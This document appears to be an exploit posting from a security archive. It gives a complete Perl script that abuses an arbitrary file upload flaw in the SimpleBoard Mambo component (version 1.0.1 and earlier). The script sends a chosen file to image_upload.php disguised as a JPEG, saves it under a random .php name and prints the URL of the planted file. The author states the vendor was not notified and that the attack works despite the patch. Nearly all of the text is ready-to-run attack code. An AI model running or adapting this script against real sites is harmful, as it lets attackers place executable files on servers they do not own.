SecurityReason - Mambo Component SimpleBoard <= 1.0.1 Arbitrary File Upload Exploit ( Exploit )

Exploit Code :

#!/usr/bin/perl

use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

my $fname = rand(99999) . ".php"; # no int()

print <<INTRO;

- SimpleBoard Mambo Component <= 1.0.1 -
- Remote Arbitrary File Upload Exploit -

Discovered && Coded by: t0pP8uZz
Discovered on: 20 October 2008
Vendor has not been notified!

Note:

This exploit is a completely diffrent
method then the prior simpleboard vulns.
which differs from the one

Same files vulnerable, But this one works with
the patch! in later versions of
SimpleBoard they removed the image_upload.php so
this wont work. but this
works on every image_upload.php version. with the
patch in place!

A common error for the exploit is if openbase_dir is
enabled, then this means
the file will not get uploaded due to the
dir restrictions.

- Peace
- irc.rizon.net #sectalk

INTRO

print "\nEnter URL(ie: http://site.com/mambo): ";
chomp(my $url=<STDIN>);

print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST
$url.'/components/com_simpleboard/image_upload.php',
Content_Type => 'form-data',
Content => [ attachimage => [ $file, $fname,
Content_Type => 'image/jpeg' ], ] );

die "HTTP POST Failed!" unless $re->is_success;

if($re->content =~ /open_basedir/) {

print "open_basedir restriction enabled. Exploit failed. See php.ini
for more details.\n"; # say() ? get perl510
}
else {

print "Looks like exploit was successfull! for uploaded file check: "
. $url . "/components/com_simpleboard/" . $fname . "\n";
}
exit;